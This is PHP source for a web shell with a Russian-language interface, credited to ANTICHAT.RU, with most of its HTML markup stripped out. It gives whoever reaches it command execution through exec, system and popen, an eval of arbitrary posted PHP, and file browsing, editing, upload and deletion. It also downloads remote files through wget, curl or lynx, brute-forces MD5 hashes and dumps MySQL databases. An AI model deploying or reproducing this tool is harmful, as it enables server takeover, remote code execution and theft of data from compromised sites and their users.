$v){$_POST[$k] = stripslashes($v);}} @ini_set('max_execution_time',0); (@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF"); (@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); (strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); $action=$_POST['action']; $file=$_POST['file']; $dir=$_POST['dir']; $content=''; $stdata=''; $style=''; $header=''.$style.''; $footer=''; $lang=array( 'filext'=>'File already exists.', 'uploadok'=>'File was successfully uploaded.', 'dircrt'=>'Dir is created.', 'dontlist'=>'Listing dir permission denide.', 'dircrterr'=>'Don\'t create dir.', 'dirnf'=>'Dir not found.', 'filenf'=>'File not found.', 'dontwrdir'=>'Only read current dir.', 'empty'=>'Directory not empty or access denide.', 'deletefileok'=>'File deleted.', 'deletedirok'=>'Dir deleted.', 'isdontfile'=>'Selected file this is link.', 'cantrfile'=>'Cant read file, permission denide.', 'onlyracc'=>'Don\'t edit, only read access.', 'workdir'=>'Work directory: ', 'fullacc'=>'Full access.', 'fullaccdir'=>'Full accees you are can create and delete dir.', 'thisnodir'=>'This is don\'t dir.', 'allfuncsh'=>'All function for work shell was disabled.' ); $act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions function test_file($file){ if(!file_exists($file))$err="1"; elseif(!is_file($file)) $err="2"; elseif(!is_readable($file))$err="3"; elseif(!is_writable($file))$err="4"; else $err="5"; return $err;} function test_dir($dir){ if(!file_exists($dir))$err="1"; elseif(!is_dir($dir)) $err="2"; elseif(!is_readable($dir))$err="3"; elseif(!is_writable($dir))$err="4"; else $err="5"; return $err;} function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); return $info;} function view_size($size){ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size;} if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; if(isset($dir)){ $ts['test']=test_dir($dir); switch($ts['test']){ case 1:$stdata.=$lang['dirnf'];break; case 2:$stdata.=$lang['thisnodir'];break; case 3:$stdata.=$lang['dontlist'];break; case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} }else $dir=@chdir($dir); $dir=getcwd()."/"; $dir=str_replace("\\","/",$dir); if(isset($file)){ $ts['test1']=test_file($file); switch ($ts['test1']){ case 1:$stdata.=$lang['filenf'];break; case 2:$stdata.=$lang['isdontfile'];break; case 3:$stdata.=$lang['cantrfile'];break; case 4:$stdata.=$lang['onlyracc'];$file=$file;break; case 5:$stdata.=$lang['fullacc'];$file=$file;break;} } function shell($cmd) { global $lang; $ret = ''; if (!empty($cmd)) { if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} else $ret=$lang['allfuncsh']; } return $ret; } function createdir($dir){mkdir($dir);} //delete file if($action=="delete"){ if(unlink($file)) $content.=$lang['deletefileok']." Click here for back in viewer"; } //delete dir if($action=="deletedir"){ if(!rmdir($file)) $content.=$lang['empty']." Click here for back in viewer"; else $content.=$lang['deletedirok']." Click here for back in viewer"; } //shell if($action=="shell"){ $content.="

".@$_POST['command']."
".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."

";} //editor if($action=="editor"){ $stdata.="

Open file:>\">

"; function writef($file,$data){ $fp = fopen($file,"w+"); fwrite($fp,$data); fclose($fp); } function readf($file){ clearstatcache(); $f=fopen($file, "r"); $contents = fread($f,filesize($file)); fclose($f); return htmlspecialchars($contents); } if(@$_POST['save'])writef($file,$_POST['data']); if(@$_POST['create'])writef($file,""); $test=test_file($file); if($test==1){ $content.="

File name:

"; } if($test>2){ $content.="

".@readf($file)."

"; }} //viewer if($action=="viewer"){ $content.=""; $content.=""; } $content.=""; for($i=0;$i'.$dire[$i].''; } for($i=0;$i'.$files[$i].'
'; } $content.="

Open directory: >\"> "; if (is_dir($dir)) { if (@$dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir . $file)=="dir") $dire[]=$file; if(filetype($dir . $file)=="file")$files[]=$file; } closedir($dh); @sort($dire); @sort($files); if ($GLOBALS['os']==1) { $content.="
Select drive:"; for ($j=ord('C'); $j<=ord('Z'); $j++) if (@$dh = opendir(chr($j).":/")) $content.=' '.chr($j).''; $content.="
Name dirs and files	type	size	permission	options
dir		'.perms($link).'	X
file	'.view_size(filesize($linkfile)).'	'.perms($linkfile).'	DEX

"; }}} //downloader if($action=="download"){ header('Content-Length:'.filesize($file).''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$file.'"'); readfile($file);} //phpeval if($action=="phpeval"){ $content.="

<?php
".@$_POST['phpev']."
?>

"; if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} //upload if($action=="upload"){ if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; $form_win=""; if($os==1)$content.=$form_win; if($os==0){ $content.=$form_win; $content.=''; } if(isset($_POST['uploadloc'])){ if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else $uploadfile = $dirupload."/".$_POST['filename']; if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} if(file_exists($uploadfile))$content.=$lang['filext']; elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) $content.=$lang['uploadok']; } if(isset($_POST['upload'])){ if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) switch($_POST['with']) { case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; }}} //Brute if($action=="brute"){ function Brute() { global $action,$pass_de,$chars_de,$dat,$date; ignore_user_abort(1); } if($chars_de==""){$chars_de="";} $content="

Upload to dir:

New file name:

wgetfetchlynxlinkscurlGETFile addres:

"; if($_POST[pass_de]){ $pass_de=htmlspecialchars($pass_de); $pass_de=stripslashes($pass_de); $dat=date("H:i:s"); $date=date("d:m:Y"); } { crack_md5(); } } function crack_md5() { global $chars_de; $chars=$_POST[chars]; set_time_limit(0); ignore_user_abort(1); $chars_de=str_replace("<",chr(60),$chars_de); $chars_de=str_replace(">",chr(62),$chars_de); $c=strlen($chars_de); for ($next = 0; $next <= 31; $next++) { for ($i1 = 0; $i1 <= $c; $i1++) { $word[1] = $chars_de{$i1}; for ($i2 = 0; $i2 <= $c; $i2++) { $word[2] = $chars_de{$i2}; if ($next <= 2) { result(implode($word)); }else { for ($i3 = 0; $i3 <= $c; $i3++) { $word[3] = $chars_de{$i3}; if ($next <= 3) { result(implode($word)); }else { for ($i4 = 0; $i4 <= $c; $i4++) { $word[4] = $chars_de{$i4}; if ($next <= 4) { result(implode($word)); }else { for ($i5 = 0; $i5 <= $c; $i5++) { $word[5] = $chars_de{$i5}; if ($next <= 5) { result(implode($word)); }else { for ($i6 = 0; $i6 <= $c; $i6++) { $word[6] = $chars_de{$i6}; if ($next <= 6) { result(implode($word)); }else { for ($i7 = 0; $i7 <= $c; $i7++) { $word[7] = $chars_de{$i7}; if ($next <= 7) { result(implode($word)); }else { for ($i8 = 0; $i8 <= $c; $i8++) { $word[8] = $chars_de{$i8}; if ($next <= 8) { result(implode($word)); }else { for ($i9 = 0; $i9 <= $c; $i9++) { $word[9] = $chars_de{$i9}; if ($next <= 9) { result(implode($word)); }else { for ($i10 = 0; $i10 <= $c; $i10++) { $word[10] = $chars_de{$i10}; if ($next <= 10) { result(implode($word)); }else { for ($i11 = 0; $i11 <= $c; $i11++) { $word[11] = $chars_de{$i11}; if ($next <= 11) { result(implode($word)); }else { for ($i12 = 0; $i12 <= $c; $i12++) { $word[12] = $chars_de{$i12}; if ($next <= 12) { result(implode($word)); }else { for ($i13 = 0; $i13 <= $c; $i13++) { $word[13] = $chars_de{$i13}; if ($next <= 13) { result(implode($word)); }else { for ($i14 = 0; $i14 <= $c; $i14++) { $word[14] = $chars_de{$i14}; if ($next <= 14) { result(implode($word)); }else { for ($i15 = 0; $i15 <= $c; $i15++) { $word[15] = $chars_de{$i15}; if ($next <= 15) { result(implode($word)); }else { for ($i16 = 0; $i16 <= $c; $i16++) { $word[16] = $chars_de{$i16}; if ($next <= 16) { result(implode($word)); }else { for ($i17 = 0; $i17 <= $c; $i17++) { $word[17] = $chars_de{$i17}; if ($next <= 17) { result(implode($word)); }else { for ($i18 = 0; $i18 <= $c; $i18++) { $word[18] = $chars_de{$i18}; if ($next <= 18) { result(implode($word)); }else { for ($i19 = 0; $i19 <= $c; $i19++) { $word[19] = $chars_de{$i19}; if ($next <= 19) { result(implode($word)); }else { for ($i20 = 0; $i20 <= $c; $i20++) { $word[20] = $chars_de{$i20}; if ($next <= 20) { result(implode($word)); }else { for ($i21 = 0; $i21 <= $c; $i21++) { $word[21] = $chars_de{$i21}; if ($next <= 21) { result(implode($word)); }else { for ($i22 = 0; $i22 <= $c; $i22++) { $word[22] = $chars_de{$i22}; if ($next <= 22) { result(implode($word)); }else { for ($i23 = 0; $i23 <= $c; $i23++) { $word[23] = $chars_de{$i23}; if ($next <= 23) { result(implode($word)); }else { for ($i24 = 0; $i24 <= $c; $i24++) { $word[24] = $chars_de{$i24}; if ($next <= 24) { result(implode($word)); }else { for ($i25 = 0; $i25 <= $c; $i25++) { $word[25] = $chars_de{$i25}; if ($next <= 25) { result(implode($word)); }else { for ($i26 = 0; $i26 <= $c; $i26++) { $word[26] = $chars_de{$i26}; if ($next <= 26) { result(implode($word)); }else { for ($i27 = 0; $i27 <= $c; $i27++) { $word[27] = $chars_de{$i27}; if ($next <= 27) { result(implode($word)); }else { for ($i28 = 0; $i28 <= $c; $i28++) { $word[28] = $chars_de{$i28}; if ($next <= 28) { result(implode($word)); }else { for ($i29 = 0; $i29 <= $c; $i29++) { $word[29] = $chars_de{$i29}; if ($next <= 29) { result(implode($word)); }else { for ($i30 = 0; $i30 <= $c; $i30++) { $word[30] = $chars_de{$i30}; if ($next <= 30) { result(implode($word)); }else { for ($i31 = 0; $i31 <= $c; $i31++) { $word[31] = $chars_de{$i31}; if ($next <= 31) { result(implode($word)); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} function result($word) { global $dat,$date; $pass_de=$_POST[pass_de]; $dat2=date("H:i:s"); $date2=date("d:m:Y"); if(md5($word)==$pass_de){ echo "

Decrypte MD5
MD5 хеш:".$pass_de."
".$chars_de."	Перебор букв: ENG: [a-z] [A-Z] [0-9] [Символы] RUS: [а-я] [А-Я]

Результат выполнения перебора паролей:
Захешированный пароль:	$word
Начало перебора:	$dat - $date
Окончание перебора:	$dat2 - $date2
Выполнение перебора хешей записан в файл: ".$word."_md5

"; $f=@fopen($word._md5,"a+"); fputs($f,"Хэш из MD5 [$pass_de] = $word Начало перебора:\t$dat - $date Окончание перебора:\t$dat2 - $date2"); exit; }} //Mysql if($action=="mysql"){ if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(@mysql_select_db($_POST['mysql_db'],$db)) { $sql1 .= "# ---------------------------------\r\n"; $sql1 .= "# date : ".date ("j F Y g:i")."\r\n"; $sql1 .= "# database : ".$_POST['mysql_db']."\r\n"; $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); $row = @mysql_fetch_row($res); $sql1 .= $row[1]."\r\n\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $sql2 = ''; $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); if (@mysql_num_rows($res) > 0) { while ($row = @mysql_fetch_assoc($res)) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = @implode("', '", $values); $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n"; } $sql2 .= "\r\n# ---------------------------------"; } $content.="Готово! Дамп прошел удачно!"; if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } else { echo $sql1.$sql2; } } // end if(@mysql_select_db($_POST['mysql_db'],$db)) else $content.="Такой БД нет!"; @mysql_close($db); } } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){ else if(!empty($_POST['dif'])&&!$fp) { $content.="ОШИБКА, нет прав записи в файл!"; } $content.="

 База:
 Сохранить дамп в файле: $str[0]"; @$tc++; } $content.="

"; @$base=$_POST['base']; @$db=$_POST['db']; $content.="

[Всего таблиц: $tc]"; if($base){ $content.="

Таблица: [$tbl]
"; $result=mysql_list_tables($db); while($str=mysql_fetch_array($result)){ $c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records=mysql_fetch_array($c); $content.="[$records[0]]$str[0]"; mysql_free_result($c); }} $content.="

"; @$vn=$_POST['vn']; $content.= "База данных: $db => $vn
"; @$inside=$_POST['inside']; @$tbl=$_POST['tbl']; if($inside){ $content.= ""; mysql_select_db($db) or die(mysql_error()); $c=mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa=mysql_fetch_array($c); mysql_free_result($c); $content.= "Всего: $cfa[0] От: До: "; @$vn=$_POST['vn']; @$from=$_POST['from']; @$to=$_POST['to']; @$from=$_POST['from']; @$to=$_POST['to']; if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); for ($i=0;$i$lee) { $nst_inside=htmlspecialchars($lee); $content.= "\r\n"; } } mysql_free_result($result); $content.= "

$nst_inside

"; }}} //end function ?>

.| Shell |. .| Viewer |. .| Editor |. .| Upload |. .| Brute |. .| Mysql Dumper|. .| Php Eval |. .| <-back |. .| forward->|.

Safe mode: Disable functions: OS: Server: Id: Status:

| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |